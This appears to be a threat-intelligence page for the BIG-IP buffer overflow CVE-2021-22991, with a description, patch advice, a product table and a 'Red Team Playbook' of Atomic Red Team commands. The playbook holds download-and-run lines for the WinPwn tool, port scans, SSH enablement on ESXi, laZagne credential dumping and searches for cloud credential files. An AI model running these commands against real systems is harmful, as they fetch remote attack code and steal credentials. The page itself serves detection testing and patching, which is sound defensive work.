CVE-2021-22991
Overview
This vulnerability is a buffer overflow caused by improper handling of certain undisclosed requests within the Traffic Management Microkernel (TMM) URI normalization process on BIG-IP devices. The flaw arises from inadequate bounds checking during URI normalization, affecting the TMM component responsible for traffic processing. This leads to memory corruption when processing crafted requests to virtual servers in specific BIG-IP software versions prior to designated patches.
Vulnerability Description
On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3, undisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow, resulting in a DoS attack. In certain situations, it may theoretically allow bypass of URL based access control or remote code execution (RCE). Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.
Impact
An unauthenticated attacker can exploit this vulnerability remotely by sending crafted requests to a BIG-IP virtual server, causing a denial of service through system crash or memory corruption. In some scenarios, the memory corruption may enable bypass of URL-based access controls or remote code execution, leading to full system compromise. This can result in disruption of network traffic management, unauthorized access to protected resources, and potential lateral movement within the network environment.
Solution
F5 Networks has released security updates addressing this vulnerability in BIG-IP versions 12.1.5.3, 13.1.3.6, 14.1.4, 15.1.2.1, and 16.0.1.1. Administrators should apply these specific patches promptly. Detailed patch instructions and advisory information are available at https://support.f5.com/csp/article/K56715231. No alternative workarounds are recommended; upgrading to the fixed versions is required to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from improper handling of requests by the Traffic Management Microkernel (TMM) within specific versions of the BIG-IP product line. This flaw is particularly concerning due to its potential to trigger a buffer overflow, a common programming error that can lead to unpredictable behavior in software. In this case, the URI normalization process is mishandled, which may allow an attacker to send specially crafted requests that exceed the buffer limits, resulting in a denial-of-service (DoS) condition. Furthermore, in certain scenarios, this vulnerability could theoretically enable attackers to bypass URL-based access controls or even achieve remote code execution (RCE), significantly amplifying the threat landscape.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft malicious requests targeting a virtual server, which, if processed by the vulnerable versions of the software, could lead to a buffer overflow. This could be executed remotely, requiring no physical access to the network or systems. The ability to bypass access controls means that attackers could potentially gain unauthorized access to sensitive resources or services, further compounding the risk. The implications of such exploitation are severe, as it not only disrupts service availability but also poses a significant threat to the integrity and confidentiality of the data managed by the affected systems.
The real-world impact of this vulnerability is substantial, especially for organizations relying on the affected BIG-IP products for critical application delivery and security functions. A successful attack could result in prolonged downtime, leading to financial losses, reputational damage, and potential regulatory repercussions. Businesses that handle sensitive data or operate in regulated industries may face additional scrutiny and penalties if they fail to protect their systems adequately. Moreover, the potential for remote code execution could allow attackers to deploy malware or exfiltrate sensitive information, further exacerbating the business risk.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, they should ensure that their systems are updated to the latest patched versions of the affected software, as the vendor has released updates addressing this flaw. Regular vulnerability assessments and penetration testing can help identify any lingering risks associated with outdated software or misconfigurations. Additionally, organizations should employ robust intrusion detection systems (IDS) and web application firewalls (WAF) to monitor for unusual traffic patterns or attempts to exploit this vulnerability. Implementing strict access controls and regularly reviewing logs can also aid in early detection of potential exploitation attempts.
In conclusion, the vulnerability affecting specific versions of the BIG-IP product line poses a significant threat to organizations that rely on these systems for application delivery and security. The potential for denial-of-service attacks, unauthorized access, and remote code execution underscores the need for immediate action to mitigate risks. By adopting proactive detection and mitigation strategies, organizations can safeguard their networks and maintain the integrity of their operations in the face of evolving cyber threats.
CSURFACE threat intelligence has detected an initial emergence of exploitation attempts targeting CVE-2021-22991, marking a significant shift from prior inactivity. Although the overall exploit pressure remains moderate, this new detection signals that threat actors are actively probing vulnerable BIG-IP Traffic Management Microkernel instances. Concurrently, telemetry indicates a sharp escalation in detection activity, underscoring increased adversary interest despite a modest decline in the EPSS score. This divergence suggests that while exploit attempts are becoming more frequent, the likelihood of widespread successful exploitation may be tempered by existing mitigations or deployment patterns. For defenders, this development elevates the urgency to monitor for anomalous traffic patterns associated with URI normalization flaws, as early detection is critical to preventing denial-of-service conditions or potential remote code execution. The risk posture for affected environments has thus shifted from theoretical to tangible, warranting heightened vigilance even in the absence of new exploit variants or ransomware linkage.
Affected Products (70)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-22991 |
| support.f5.com |
GitHub CVE
x_refsource_MISC
|
https://support.f5.com/csp/article/K56715231 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22991 |